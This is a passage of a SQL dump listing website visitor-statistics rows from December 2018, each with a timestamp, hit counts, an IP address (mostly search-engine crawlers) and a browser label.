9.198.25','other'),(356680,1545424707,1,1,0,0,'216.244.66.241','other'),(356681,1545425216,1,1,0,0,'178.154.244.11','other'),(356682,1545425392,1,1,0,0,'207.46.13.116','other'),(356683,1545425467,1,1,0,0,'95.108.181.54','other'),(356684,1545425470,1,1,0,0,'178.154.244.49','other'),(356685,1545425840,2,2,0,0,'141.8.142.103','other'),(356686,1545425896,1,1,0,0,'87.250.224.47','other'),(356687,1545425933,1,1,0,0,'95.108.213.4','other'),(356688,1545426112,1,1,0,0,'5.45.207.19','other'),(356689,1545426124,2,2,0,0,'5.45.207.79','other'),(356690,1545426632,6,6,0,0,'216.244.66.241','other'),(356691,1545426774,2,2,0,0,'66.249.66.155','chrome'),(356693,1545426991,1,1,0,0,'66.249.66.154','chrome'),(356694,1545427132,1,1,0,0,'207.46.13.61','other'),(356695,1545427143,1,1,0,0,'207.46.13.62','other'),(356696,1545427785,1,1,0,0,'46.229.168.139','other'),(356697,1545427963,1,1,0,0,'40.77.167.24','other'),(356698,1545427997,3,3,0,0,'37.144.76.64','firefox'),(356699,1545428003,1,1,0,0,'5.167.112.162','firefox'),(356700,1545428036,1,1,0,0,'79.111.106.204','firefox'),(356701,1545428042,1,1,0,0,'89.178.238.219','firefox'),(356702,1545428131,1,1,0,0,'77.37.172.233','firefox'),(356703,1545428191,1,1,0,0,'207.46.13.61','other'),(356704,1545428261,1,1,0,0,'46.229.168.142','other'),(356705,1545428681,1,1,0,0,'66.249.66.40','chrome'),(356706,1545428738,1,1,0,0,'207.46.13.62','other'),(356707,1545428930,2,2,0,0,'66.249.66.154','chrome'),(356708,1545429204,3,3,0,0,'66.249.66.152','chrome'),(356709,1545429308,1,1,0,0,'66.249.66.156','chrome'),(356710,1545429408,2,2,0,0,'40.77.167.24','other'),(356711,1545429578,1,1,0,0,'178.154.244.11','other'),(356712,1545429628,1,1,0,0,'5.45.207.79','other'),(356713,1545429825,1,1,0,0,'66.249.66.57','chrome'),(356714,1545429826,1,1,0,0,'66.249.66.44','chrome'),(356715,1545429831,1,1,0,0,'141.8.142.103','other'),(356716,1545430305,4,4,0,0,'5.45.207.19','other'),(356717,1545430403,2,2,0,0,'216.244.66.241','other'),(356718,1545430428,2,2,0,0,'95.163.255.112','other'),(356719,1545430677,1,1,0,0,'66.249.66.40','chrome'),(356720,1545430978,3,3,0,0,'95.163.255.105','other'),(356721,1545431133,2,2,0,0,'95.163.255.117','other'),(356722,1545431305,1,1,0,0,'95.163.255.102','other'),(356723,1545431593,2,2,0,0,'66.249.66.157','chrome'),(356724,1545431746,3,3,0,0,'95.163.255.115','other'),(356725,1545431748,1,1,0,0,'46.229.168.139','other'),(356726,1545431798,2,2,0,0,'66.249.66.152','chrome'),(356727,1545431855,1,1,0,0,'95.163.255.112','other'),(356728,1545431895,1,1,0,0,'95.163.255.118','other'),(356729,1545431900,1,1,0,0,'207.46.13.61','other'),(356730,1545431925,1,1,0,0,'95.163.255.103','other'),(356731,1545432331,1,1,0,0,'5.45.207.79','other'),(356732,1545432404,1,1,0,0,'66.249.66.154','chrome'),(356733,1545432791,1,1,0,0,'46.229.168.148','other'),(356734,1545432856,2,2,0,0,'46.211.24.211','chrome'),(356735,1545432881,4,4,0,0,'178.154.244.11','other'),(356736,1545432952,3,3,0,0,'5.45.207.19','other'),(356737,1545433325,1,1,0,0,'66.249.66.57','chrome'),(356738,1545433326,2,2,0,0,'66.249.66.44','chrome'),(356739,1545433470,3,3,0,0,'216.244.66.241','other'),(356740,1545433531,1,1,0,0,'66.249.66.156','chrome'),(356741,1545433679,3,3,0,0,'5.45.207.79','other'),(356742,1545434013,3,3,0,0,'178.154.244.11','other'),(356743,1545434138,1,1,0,0,'207.46.13.20','other'),(356744,1545434173,1,1,0,0,'141.8.142.103','other'),(356745,1545434354,1,1,0,0,'8.29.198.25','other'),(356746,1545434824,1,1,0,0,'66.249.66.154','chrome'),(356747,1545434848,1,1,0,0,'5.45.207.19','other'),(356748,1545434869,2,2,0,0,'66.249.66.152','chrome'),(356749,1545435044,1,1,0,0,'5.45.207.79','other'),(356750,1545435319,1,1,0,0,'8.29.198.26','other'),(356751,1545435323,1,1,0,0,'178.154.244.11','other'),(356752,1545435489,1,1,0,0,'207.46.13.20','other'),(356753,1545435856,3,3,0,0,'216.244.66.241','other'),(356754,1545435963,1,1,0,0,'66.249.66.42','chrome'),(356755,1545436265,1,1,0,0,'40.77.167.24','other'),(356756,1545436678,1,1,0,0,'207.46.13.253','other'),(356757,1545436901,1,1,0,0,'66.249.66.152','chrome'),(356758,1545436915,1,1,0,0,'37.9.113.148','other'),(356759,1545437125,1,1,0,0,'46.229.168.129','other'),(356760,1545437369,1,1,0,0,'66.249.66.42','chrome'),(356761,1545437843,1,1,0,0,'95.163.255.106','other'),(356762,1545437897,1,1,0,0,'95.163.255.109','other'),(356763,1545437979,2,2,0,0,'178.154.244.11','other'),(356764,1545438926,5,5,0,0,'178.154.244.11','other'),(356765,1545438960,1,1,0,0,'46.229.168.144','other'),(356766,1545439039,1,1,0,0,'46.229.168.152','other'),(356767,1545439041,1,1,0,0,'46.229.168.140','other'),(356768,1545439354,1,1,0,0,'5.45.207.19','other'),(356769,1545439468,3,3,0,0,'216.244.66.241','other'),(356770,1545439882,1,1,0,0,'180.76.15.158','other'),(356771,1545439883,1,1,0,0,'180.76.15.31','other'),(356772,1545440026,1,1,0,0,'5.45.207.79','other'),(356773,1545440063,1,1,0,0,'66.249.66.59','chrome'),(356774,1545440093,1,1,0,0,'66.249.66.40','chrome'),(356775,1545440126,1,1,0,0,'195.123.221.122','other'),(356776,1545440562,1,1,0,0,'66.249.66.152','chrome'),(356777,1545440854,2,2,0,0,'66.249.66.42','chrome'),(356778,1545440921,1,1,0,0,'46.229.168.151','other'),(356779,1545440973,2,2,0,0,'40.77.167.24','other'),(356780,1545441016,1,1,0,0,'66.249.66.154','chrome'),(356781,1545441661,1,1,0,0,'5.45.207.19','other'),(356782,1545441662,1,1,0,0,'141.8.142.103','other'),(356783,1545441822,1,1,0,0,'66.249.66.42','chrome'),(356784,1545441938,3,3,0,0,'216.244.66.241','other'),(356786,1545441943,1,1,0,0,'66.249.66.152','chrome'),(356787,1545442526,1,1,0,0,'46.229.168.151','other'),(356788,1545442734,3,3,0,0,'5.58.93.101','opera'),(356789,1545442824,1,1,0,0,'188.114.53.0','chrome'),(356790,1545443051,3,3,0,0,'216.244.66.241','other'),(356791,1545443277,1,1,0,0,'66.249.66.154','chrome'),(356792,1545443570,2,2,0,0,'46.229.168.153','other'),(356793,1545443572,1,1,0,0,'46.229.168.132','other'),(356794,1545443663,1,1,0,0,'66.249.66.157','chrome'),(356795,1545444069,1,1,0,0,'46.229.168.129','other'),(356796,1545444305,1,1,0,0,'46.229.168.143','other'),(356797,1545444488,1,1,0,0,'66.249.66.152','chrome'),(356798,1545445001,1,1,0,0,'46.229.168.153','other'),(356799,1545445182,1,1,0,0,'8.29.198.26','other'),(356800,1545445387,1,1,0,0,'66.249.66.155','chrome'),(356801,1545445389,3,3,0,0,'66.249.66.152','chrome'),(356802,1545445699,3,3,0,0,'66.249.66.156','chrome'),(356803,1545445874,2,2,0,0,'216.244.66.241','other'),(356804,1545445969,2,2,0,0,'207.46.13.20','other'),(356805,1545446157,1,1,0,0,'8.29.198.27','other'),(356806,1545446290,3,3,0,0,'66.249.66.152','chrome'),(356807,1545446414,1,1,0,0,'66.249.66.154','chrome'),(356808,1545446794,1,1,0,0,'46.229.168.151','other'),(356809,1545446881,2,2,0,0,'52.41.156.113','chrome'),(356810,1545446900,2,2,0,0,'5.45.207.19','other'),(356811,1545447116,1,1,0,0,'5.45.207.79','other'),(356812,1545447282,1,1,0,0,'141.8.142.103','other'),(356813,1545447412,2,2,0,0,'66.249.66.154','chrome'),(356814,1545447709,2,2,0,0,'178.154.244.11','other'),(356815,1545447749,1,1,0,0,'66.249.66.156','chrome'),(356816,1545447750,2,2,0,0,'66.249.66.152','chrome'),(356817,1545447787,1,1,0,0,'37.112.23.18','chrome'),(356818,1545448203,1,1,0,0,'5.45.207.79','other'),(356819,1545448243,1,1,0,0,'207.46.13.79','other'),(356820,1545448657,1,1,0,0,'216.244.66.241','other'),(356821,1545449161,1,1,0,0,'141.8.142.103','other'),(356822,1545449527,1,1,0,0,'66.249.66.154','chrome'),(356823,1545449666,1,1,0,0,'46.229.168.142','other'),(356824,1545449689,2,2,0,0,'207.46.13.79','other'),(356825,1545450450,2,2,0,0,'66.249.66.42','chrome'),(356826,1545450593,1,1,0,0,'5.45.207.19','other'),(356827,1545450965,1,1,0,0,'157.55.39.243','other'),(356828,1545451268,1,1,0,0,'66.249.66.44','chrome'),(356829,1545451301,1,1,0,0,'66.249.66.154','chrome'),(356830,1545451485,1,1,0,0,'157.55.39.125','other'),(356831,1545451654,2,2,0,0,'216.244.66.241','other'),(356832,1545452414,1,1,0,0,'157.55.39.125','other'),(356833,1545452594,1,1,0,0,'66.249.66.40','chrome'),(356834,1545452642,1,1,0,0,'216.244.66.241','other'),(356835,1545452679,1,1,0,0,'35.192.84.7','other'),(356836,1545453025,1,1,0,0,'66.249.66.44','chrome'),(356837,1545453349,3,3,0,0,'66.249.66.154','chrome'),(356838,1545453649,70,70,0,0,'69.30.211.2','other'),(356839,1545454059,1,1,0,0,'66.249.66.156','chrome'),(356840,1545454081,1,1,0,0,'66.249.66.157','chrome'),(356841,1545454146,1,1,0,0,'66.249.66.152','chrome'),(356842,1545454174,230,230,0,0,'144.76.96.236','other'),(356843,1545454290,3,3,0,0,'216.244.66.241','other'),(356844,1545454519,1,1,0,0,'46.229.168.144','other'),(356845,1545454559,72,72,0,0,'69.30.211.2','other'),(356846,1545454635,2,2,0,0,'95.213.141.126','opera'),(356847,1545454737,1,1,0,0,'66.249.66.154','chrome'),(356848,1545455151,1,1,0,0,'46.188.32.25','msie'),(356849,1545455173,1,1,0,0,'66.249.66.152','chrome'),(356850,1545455443,1,1,0,0,'178.154.244.11','other'),(356851,1545455467,78,78,0,0,'69.30.211.2','other'),(356852,1545455905,1,1,0,0,'46.229.168.145','other'),(356853,1545456005,1,1,0,0,'8.29.198.25','other'),(356854,1545456131,1,1,0,0,'216.244.66.241','other'),(356855,1545456377,71,71,0,0,'69.30.211.2','other'),(356856,1545456385,1,1,0,0,'157.55.39.243','other'),(356857,1545456440,1,1,0,0,'46.229.168.154','other'),(356858,1545456489,1,1,0,0,'66.249.66.40','chrome'),(356859,1545456593,1,1,0,0,'141.8.142.103','other'),(356860,1545456715,1,1,0,0,'66.249.66.152','chrome'),(356861,1545456890,2,2,0,0,'5.45.207.79','other'),(356862,1545457001,1,1,0,0,'8.29.198.26','other'),(356863,1545457288,67,67,0,0,'69.30.211.2','other'),(356864,1545457646,1,1,0,0,'46.229.168.153','other'),(356865,1545457841,1,1,0,0,'66.249.66.40','chrome'),(356866,1545457941,1,1,0,0,'66.249.66.152','chrome'),(356867,1545457957,1,1,0,0,'157.55.39.243','other'),(356868,1545458203,70,70,0,0,'69.30.211.2','other'),(356869,1545458366,1,1,0,0,'66.249.66.44','chrome'),(356870,1545458479,1,1,0,0,'95.163.255.112','other'),(356871,1545458492,1,1,0,0,'95.163.255.102','other'),(356872,1545458626,1,1,0,0,'216.244.66.241','other'),(356873,1545458693,1,1,0,0,'46.229.168.153','other'),(356874,1545458695,1,1,0,0,'46.229.168.141','other'),(356875,1545458970,1,1,0,0,'40.77.167.24','other'),(356876,1545459002,1,1,0,0,'46.229.168.132','other'),(356877,1545459084,2,2,0,0,'5.45.207.19','other'),(356878,1545459115,72,72,0,0,'69.30.211.2','other'),(356879,1545459292,3,3,0,0,'141.8.142.103','other'),(356880,1545459343,3,3,0,0,'178.154.244.11','other'),(356881,1545459648,1,1,0,0,'87.250.224.47','other'),(356882,1545459659,1,1,0,0,'95.108.213.4','other'),(356883,1545459914,1,1,0,0,'5.45.207.79','other'),(356884,1545459925,1,1,0,0,'66.249.66.156','chrome'),(356885,1545459926,1,1,0,0,'66.249.66.220','chrome'),(356886,1545460020,24,24,0,0,'69.30.211.2','other'),(356887,1545460107,1,1,0,0,'66.249.66.218','chrome'),(356888,1545460181,1,1,0,0,'66.249.66.155','chrome'),(356890,1545460298,1,1,0,0,'46.229.168.142','other'),(356891,1545460347,1,1,0,0,'141.8.142.103','other'),(356892,1545460440,1,1,0,0,'5.45.207.19','other'),(356893,1545460473,2,2,0,0,'91.196.178.67','chrome'),(356894,1545460574,1,1,0,0,'178.154.244.11','other'),(356895,1545460861,2,2,0,0,'66.249.66.156','chrome'),(356896,1545460900,2,2,0,0,'66.249.66.40','chrome'),(356897,1545460943,1,1,0,0,'46.229.168.133','other'),(356898,1545461021,2,2,0,0,'178.95.66.202','chrome'),(356899,1545461222,2,2,0,0,'216.244.66.241','other'),(356900,1545461552,1,1,0,0,'66.249.66.222','chrome'),(356901,1545461885,1,1,0,0,'66.249.66.155','chrome'),(356902,1545462393,1,1,0,0,'13.57.233.99','chrome'),(356903,1545462507,4,4,0,0,'66.249.66.156','chrome'),(356904,1545462529,2,2,0,0,'109.86.13.125','firefox'),(356905,1545462708,1,1,0,0,'66.249.66.154','chrome'),(356906,1545462740,1,1,0,0,'178.154.244.11','other'),(356907,1545463133,1,1,0,0,'5.45.207.19','other'),(356908,1545463248,1,1,0,0,'66.249.66.152','chrome'),(356909,1545463294,2,2,0,0,'5.45.207.79','other'),(356910,1545463437,2,2,0,0,'91.196.178.70','firefox'),(356911,1545463601,2,2,0,0,'178.92.74.144','chrome'),(356912,1545463765,1,1,0,0,'66.249.66.42','chrome'),(356913,1545463908,2,2,0,0,'178.154.244.11','other'),(356914,1545464043,1,1,0,0,'141.8.142.103','other'),(356915,1545464127,2,2,0,0,'216.244.66.241','other'),(356916,1545464159,1,1,0,0,'66.249.66.152','chrome'),(356917,1545464380,1,1,0,0,'66.249.66.155','chrome'),(356918,1545464381,1,1,0,0,'66.249.66.156','chrome'),(356919,1545464450,4,4,0,0,'157.55.39.243','other'),(356920,1545464585,2,2,0,0,'91.196.178.182','chrome'),(356921,1545464685,1,1,0,0,'40.77.167.203','other'),(356922,1545464732,3,3,0,0,'40.77.167.24','other'),(356923,1545464961,1,1,0,0,'66.249.66.59','chrome'),(356924,1545464962,2,2,0,0,'66.249.66.44','chrome'),(356925,1545464984,1,1,0,0,'207.46.13.238','other'),(356926,1545465357,1,1,0,0,'66.249.66.154','chrome'),(356927,1545465492,2,2,0,0,'157.55.39.125','other'),(356928,1545465544,1,1,0,0,'66.249.66.42','chrome'),(356929,1545465730,1,1,0,0,'5.45.207.79','other'),(356930,1545466281,1,1,0,0,'18.184.52.215','other'),(356931,1545466700,2,2,0,0,'91.196.178.132','chrome'),(356932,1545466825,1,1,0,0,'8.29.198.26','other'),(356933,1545467427,1,1,0,0,'5.45.207.19','other'),(356934,1545467482,2,2,0,0,'146.185.157.250','chrome'),(356935,1545467547,2,2,0,0,'216.244.66.241','other'),(356936,1545467841,1,1,0,0,'8.29.198.25','other'),(356937,1545467886,2,2,0,0,'66.249.66.152','chrome'),(356938,1545468028,3,3,0,0,'66.249.66.154','chrome'),(356939,1545468125,1,1,0,0,'46.229.168.143','other'),(356940,1545468159,1,1,0,0,'66.249.66.44','chrome'),(356941,1545468263,1,1,0,0,'46.229.168.132','other'),(356942,1545468310,1,1,0,0,'46.229.168.140','other'),(356943,1545468372,1,1,0,0,'46.229.168.145','other'),(356944,1545468612,1,1,0,0,'5.45.207.19','other'),(356945,1545468686,1,1,0,0,'66.249.66.42','chrome'),(356946,1545469043,1,1,0,0,'46.229.168.152','other'),(356947,1545469100,1,1,0,0,'5.45.207.79','other'),(356948,1545469490,1,1,0,0,'176.124.134.208','chrome'),(356949,1545469654,1,1,0,0,'178.154.244.11','other'),(356950,1545469732,2,2,0,0,'66.249.66.156','chrome'),(356951,1545469828,1,1,0,0,'66.249.66.42','chrome'),(356952,1545469892,2,2,0,0,'91.196.178.67','chrome'),(356953,1545469964,1,1,0,0,'66.249.66.40','chrome'),(356954,1545470052,3,3,0,0,'95.134.189.6','chrome'),(356955,1545470119,1,1,0,0,'46.229.168.134','other'),(356956,1545470121,1,1,0,0,'46.229.168.130','other'),(356957,1545470246,1,1,0,0,'40.77.167.129','other'),(356958,1545470309,1,1,0,0,'5.45.207.19','other'),(356959,1545470615,2,2,0,0,'178.154.244.11','other'),(356960,1545470709,1,1,0,0,'141.8.142.108','other'),(356961,1545470715,1,1,0,0,'95.108.181.75','other'),(356962,1545470841,2,2,0,0,'66.249.66.42','chrome'),(356963,1545471134,1,1,0,0,'95.108.213.4','other'),(356964,1545471262,2,2,0,0,'216.244.66.241','other'),(356965,1545471301,1,1,0,0,'37.9.113.103','other'),(356966,1545471765,2,2,0,0,'91.218.195.113','chrome'),(356967,1545471959,1,1,0,0,'46.229.168.141','other'),(356968,1545472139,1,1,0,0,'40.77.167.129','other'),(356969,1545472186,1,1,0,0,'157.55.39.243','other'),(356970,1545472194,1,1,0,0,'46.229.168.153','other'),(356971,1545472310,1,1,0,0,'66.249.66.152','chrome'),(356972,1545472520,1,1,0,0,'31.184.238.34','chrome'),(356973,1545472525,1,1,0,0,'91.196.178.169','firefox'),(356974,1545472772,3,3,0,0,'216.244.66.241','other'),(356975,1545473252,1,1,0,0,'178.154.244.11','other'),(356976,1545473458,1,1,0,0,'66.249.66.156','chrome'),(356977,1545473726,1,1,0,0,'40.77.167.129','other'),(356978,1545474037,1,1,0,0,'216.244.66.241','other'),(356979,1545474080,1,1,0,0,'66.249.66.152','chrome'),(356980,1545474505,1,1,0,0,'5.45.207.19','other'),(356981,1545474665,1,1,0,0,'66.249.66.44','chrome'),(356982,1545474700,2,2,0,0,'46.229.168.146','other'),(356983,1545474705,1,1,0,0,'46.229.168.129','other'),(356984,1545474755,2,2,0,0,'157.55.39.243','other'),(356985,1545474763,1,1,0,0,'37.73.185.49','other'),(356986,1545474769,1,1,0,0,'46.229.168.132','other'),(356987,1545475182,1,1,0,0,'66.249.66.42','chrome'),(356988,1545475449,1,1,0,0,'66.249.66.156','chrome'),(356989,1545475651,2,2,0,0,'157.55.39.186','other'),(356990,1545475681,1,1,0,0,'46.229.168.135','other'),(356991,1545476357,4,4,0,0,'216.244.66.241','other'),(356992,1545476811,1,1,0,0,'180.76.15.6','other'),(356993,1545477102,1,1,0,0,'46.229.168.152','other'),(356994,1545477302,2,2,0,0,'5.45.207.79','other'),(356995,1545477325,1,1,0,0,'141.8.142.103','other'),(356996,1545477365,1,1,0,0,'66.249.66.61','chrome'),(356997,1545477465,1,1,0,0,'66.249.66.220','chrome'),(356998,1545477541,2,2,0,0,'178.154.244.11','other'),(356999,1545477651,1,1,0,0,'8.29.198.27','other'),(357000,1545477688,2,2,0,0,'157.55.39.186','other'),(357001,1545478265,1,1,0,0,'5.45.207.79','other'),(357002,1545478293,1,1,0,0,'5.45.207.19','other'),(357003,1545478343,1,1,0,0,'141.8.142.103','other'),(357004,1545478417,5,5,0,0,'40.77.167.24','other'),(357005,1545478476,1,1,0,0,'66.249.66.156','chrome'),(357006,1545478617,1,1,0,0,'66.249.66.61','chrome'),(357007,1545478618,1,1,0,0,'66.249.66.44','chrome'),(357008,1545478669,1,1,0,0,'8.29.198.25','other'),(357009,1545478805,5,5,0,0,'31.43.12.168','chrome'),(357010,1545478810,1,1,0,0,'180.76.15.17','other'),(357011,1545478811,1,1,0,0,'180.76.15.7','other'),(357012,1545479341,2,2,0,0,'178.154.244.11','other'),(357013,1545479487,1,1,0,0,'5.45.207.79','other'),(357014,1545479560,1,1,0,0,'66.249.66.154','chrome'),(357015,1545479654,1,1,0,0,'207.46.13.207','other'),(357016,1545479967,1,1,0,0,'40.77.167.129','other'),(357017,1545480259,1,1,0,0,'216.244.66.241','other'),(357018,1545480300,1,1,0,0,'46.229.168.145','other'),(357019,1545480775,2,2,0,0,'40.77.167.103','other'),(357020,1545480867,2,2,0,0,'66.249.66.152','chrome'),(357021,1545481220,1,1,0,0,'207.46.13.207','other'),(357022,1545481534,1,1,0,0,'66.249.66.156','chrome'),(357023,1545481757,4,4,0,0,'178.154.244.11','other'),(357024,1545481878,4,4,0,0,'5.45.207.79','other'),(357025,1545481935,1,1,0,0,'46.229.168.143','other'),(357026,1545481978,4,4,0,0,'216.244.66.241','other'),(357027,1545482297,1,1,0,0,'66.249.66.57','chrome'),(357029,1545482524,1,1,0,0,'37.73.153.146','chrome'),(357030,1545482526,1,1,0,0,'66.249.66.195','chrome'),(357032,1545482770,1,1,0,0,'207.46.13.224','other'),(357033,1545482818,1,1,0,0,'157.55.39.186','other'),(357034,1545482988,1,1,0,0,'66.249.66.40','chrome'),(357035,1545483134,1,1,0,0,'66.249.66.42','chrome'),(357036,1545483151,1,1,0,0,'66.249.66.156','chrome'),(357037,1545483364,1,1,0,0,'46.229.168.134','other'),(357038,1545483768,1,1,0,0,'157.55.39.186','other'),(357039,1545483810,1,1,0,0,'66.249.66.155','chrome'),(357040,1545483815,1,1,0,0,'66.249.66.152','chrome'),(357041,1545483943,2,2,0,0,'46.211.120.37','chrome'),(357042,1545484118,1,1,0,0,'37.73.144.125','chrome'),(357043,1545484781,1,1,0,0,'46.229.168.136','other'),(357044,1545484783,1,1,0,0,'46.229.168.137','other'),(357045,1545484858,1,1,0,0,'66.249.66.44','chrome'),(357046,1545484884,1,1,0,0,'66.249.66.156','chrome'),(357047,1545484946,1,1,0,0,'66.249.66.154','chrome'),(357048,1545485060,1,1,0,0,'216.244.66.241','other'),(357049,1545485141,2,2,0,0,'82.207.49.94','chrome'),(357050,1545485194,1,1,0,0,'46.229.168.140','other'),(357051,1545485433,2,2,0,0,'5.83.23.13','chrome'),(357052,1545485657,1,1,0,0,'46.229.168.134','other'),(357053,1545485905,1,1,0,0,'193.104.213.101','firefox'),(357054,1545486025,2,2,0,0,'216.244.66.241','other'),(357055,1545486667,1,1,0,0,'66.249.66.154','chrome'),(357056,1545486693,2,2,0,0,'178.154.244.11','other'),(357057,1545486726,1,1,0,0,'157.55.39.186','other'),(357058,1545486771,1,1,0,0,'66.249.66.157','chrome'),(357059,1545486794,5,5,0,0,'66.249.66.156','chrome'),(357060,1545486831,1,1,0,0,'66.249.66.155','chrome'),(357061,1545487315,2,2,0,0,'66.249.66.152','chrome'),(357062,1545487791,1,1,0,0,'66.249.66.156','chrome'),(357063,1545487801,1,1,0,0,'40.77.167.103','other'),(357064,1545487880,1,1,0,0,'5.45.207.79','other'),(357065,1545488123,1,1,0,0,'216.244.66.241','other'),(357066,1545488299,2,2,0,0,'46.229.168.137','other'),(357067,1545488481,1,1,0,0,'8.29.198.25','other'),(357068,1545488508,1,1,0,0,'66.249.66.42','chrome'),(357069,1545488717,1,1,0,0,'46.229.168.146','other'),(357070,1545488936,1,1,0,0,'46.229.168.142','other'),(357071,1545488938,1,1,0,0,'46.229.168.154','other'),(357072,1545488952,2,2,0,0,'66.249.66.152','chrome'),(357073,1545489027,4,4,0,0,'216.244.66.241','other'),(357074,1545489097,2,2,0,0,'46.211.120.37','chrome'),(357075,1545489291,2,2,0,0,'66.249.66.156','chrome'),(357076,1545489505,1,1,0,0,'8.29.198.25','other'),(357077,1545489661,1,1,0,0,'178.154.244.11','other'),(357078,1545489667,1,1,0,0,'66.249.66.40','chrome'),(357079,1545489717,1,1,0,0,'5.58.40.52','opera'),(357080,1545490056,1,1,0,0,'13.66.139.0','other'),(357081,1545490099,1,1,0,0,'216.244.66.241','other'),(357082,1545490803,1,1,0,0,'66.249.66.157','chrome'),(357083,1545490826,1,1,0,0,'66.249.66.152','chrome'),(357084,1545490995,1,1,0,0,'66.249.66.44','chrome'),(357085,1545491407,1,1,0,0,'46.166.190.143','other'),(357086,1545491882,2,2,0,0,'216.244.66.241','other'),(357087,1545493046,2,2,0,0,'216.244.66.241','other'),(357088,1545493472,2,2,0,0,'178.154.244.11','other'),(357089,1545493561,3,3,0,0,'5.45.207.79','other'),(357090,1545493648,2,2,0,0,'91.209.11.236','other'),(357091,1545493835,1,1,0,0,'66.249.66.154','chrome'),(357092,1545493945,2,2,0,0,'141.8.142.103','other'),(357093,1545494102,1,1,0,0,'5.45.207.19','other'),(357094,1545494456,1,1,0,0,'87.250.224.47','other'),(357095,1545494671,1,1,0,0,'178.154.171.24','other'),(357096,1545494807,4,4,0,0,'216.244.66.241','other'),(357097,1545494868,2,2,0,0,'178.154.244.11','other'),(357098,1545495007,10,10,0,0,'207.46.13.207','other'),(357099,1545495137,1,1,0,0,'40.77.167.55','other'),(357100,1545495280,1,1,0,0,'207.46.13.94','other'),(357101,1545495474,1,1,0,0,'5.45.207.79','other'),(357102,1545495499,1,1,0,0,'141.8.142.103','other'),(357103,1545495795,1,1,0,0,'46.229.168.137','other'),(357104,1545496011,1,1,0,0,'66.249.66.156','chrome'),(357105,1545496183,2,2,0,0,'66.249.66.157','chrome'),(357106,1545496184,2,2,0,0,'66.249.66.154','chrome'),(357107,1545496186,1,1,0,0,'66.249.66.152','chrome'),(357108,1545496519,1,1,0,0,'46.229.168.138','other'),(357109,1545496521,1,1,0,0,'46.229.168.145','other'),(357110,1545496648,1,1,0,0,'66.249.66.57','chrome'),(357111,1545496662,2,2,0,0,'66.249.66.40','chrome'),(357112,1545496996,1,1,0,0,'46.229.168.147','other'),(357113,1545496998,1,1,0,0,'46.229.168.136','other'),(357114,1545497432,1,1,0,0,'180.76.15.151','other'),(357115,1545497554,2,2,0,0,'202.198.224.3','other'),(357116,1545497692,3,3,0,0,'216.244.66.241','other'),(357117,1545497695,16,16,0,0,'157.55.39.186','other'),(357118,1545497710,1,1,0,0,'66.249.66.157','chrome'),(357119,1545497723,1,1,0,0,'66.249.66.152','chrome'),(357120,1545498249,1,1,0,0,'46.229.168.135','other'),(357121,1545498435,2,2,0,0,'77.111.247.252','chrome'),(357122,1545498511,1,1,0,0,'66.249.66.59','chrome'),(357123,1545498529,1,1,0,0,'66.249.66.40','chrome'),(357124,1545498587,1,1,0,0,'91.196.178.131','chrome'),(357125,1545498761,4,4,0,0,'216.244.66.241','other'),(357126,1545499310,1,1,0,0,'8.29.198.25','other'),(357127,1545499748,1,1,0,0,'46.229.168.138','other'),(357128,1545499977,1,1,0,0,'13.66.139.0','other'),(357129,1545500340,1,1,0,0,'8.29.198.25','other'),(357130,1545500618,1,1,0,0,'40.77.167.55','other'),(357131,1545500835,3,3,0,0,'46.211.56.224','chrome'),(357132,1545500864,3,3,0,0,'82.145.209.175','other'),(357133,1545501134,2,2,0,0,'216.244.66.241','other'),(357134,1545501152,1,1,0,0,'46.229.168.136','other'),(357135,1545501154,1,1,0,0,'46.229.168.147','other'),(357136,1545502375,2,2,0,0,'216.244.66.241','other'),(357137,1545502582,1,1,0,0,'66.249.66.157','chrome'),(357138,1545502636,1,1,0,0,'66.249.66.154','chrome'),(357139,1545502676,1,1,0,0,'66.249.66.59','chrome'),(357140,1545502747,1,1,0,0,'66.249.66.44','chrome'),(357141,1545502913,1,1,0,0,'46.229.168.143','other'),(357142,1545503077,1,1,0,0,'5.45.207.79','other'),(357143,1545503287,1,1,0,0,'13.66.139.0','other'),(357145,1545503809,2,2,0,0,'216.244.66.241','other'),(357146,1545503834,3,3,0,0,'66.249.66.57','chrome'),(357147,1545503855,2,2,0,0,'66.249.66.42','chrome'),(357148,1545504537,1,1,0,0,'5.45.207.19','other'),(357149,1545504547,1,1,0,0,'66.249.66.40','chrome'),(357150,1545504640,1,1,0,0,'66.249.66.156','chrome'),(357151,1545504806,1,1,0,0,'178.154.244.11','other'),(357152,1545504892,1,1,0,0,'157.55.39.186','other'),(357153,1545504904,1,1,0,0,'46.229.168.150','other'),(357154,1545504907,1,1,0,0,'46.229.168.140','other'),(357155,1545506383,1,1,0,0,'66.249.66.156','chrome'),(357156,1545506662,1,1,0,0,'66.249.66.157','chrome'),(357157,1545506705,1,1,0,0,'66.249.66.152','chrome'),(357158,1545506779,1,1,0,0,'40.77.167.55','other'),(357159,1545506924,2,2,0,0,'66.249.66.42','chrome'),(357160,1545506925,3,3,0,0,'216.244.66.241','other'),(357161,1545506946,2,2,0,0,'91.196.178.169','chrome'),(357162,1545507043,1,1,0,0,'46.229.168.133','other'),(357163,1545507045,1,1,0,0,'46.229.168.141','other'),(357164,1545507070,1,1,0,0,'40.77.167.59','other'),(357165,1545507088,1,1,0,0,'180.76.15.135','other'),(357166,1545507090,1,1,0,0,'180.76.15.7','other'),(357167,1545507580,1,1,0,0,'177.17.228.93','chrome'),(357168,1545507846,3,3,0,0,'216.244.66.241','other'),(357169,1545507851,1,1,0,0,'66.249.66.57','chrome'),(357170,1545507852,1,1,0,0,'13.66.139.0','other'),(357171,1545508112,1,1,0,0,'66.249.66.40','chrome'),(357172,1545508550,1,1,0,0,'46.229.168.152','other'),(357173,1545508552,1,1,0,0,'46.229.168.141','other'),(357174,1545508759,1,1,0,0,'66.249.66.59','chrome'),(357175,1545508777,1,1,0,0,'66.249.66.42','chrome'),(357176,1545509518,1,1,0,0,'207.46.13.25','other'),(357177,1545509765,1,1,0,0,'216.244.66.241','other'),(357178,1545510142,1,1,0,0,'8.29.198.25','other'),(357179,1545510892,1,1,0,0,'18.184.52.215','other'),(357180,1545511066,1,1,0,0,'91.196.178.59','chrome'),(357181,1545511072,4,4,0,0,'216.244.66.241','other'),(357182,1545511177,1,1,0,0,'8.29.198.25','other'),(357183,1545512230,1,1,0,0,'157.55.39.186','other'),(357184,1545512296,2,2,0,0,'46.201.179.163','chrome'),(357185,1545512404,1,1,0,0,'176.117.82.209','firefox'),(357186,1545512914,2,2,0,0,'40.77.167.165','other'),(357187,1545513025,1,1,0,0,'66.249.66.152','chrome'),(357188,1545513039,1,1,0,0,'46.229.168.151','other'),(357189,1545513229,1,1,0,0,'207.46.13.94','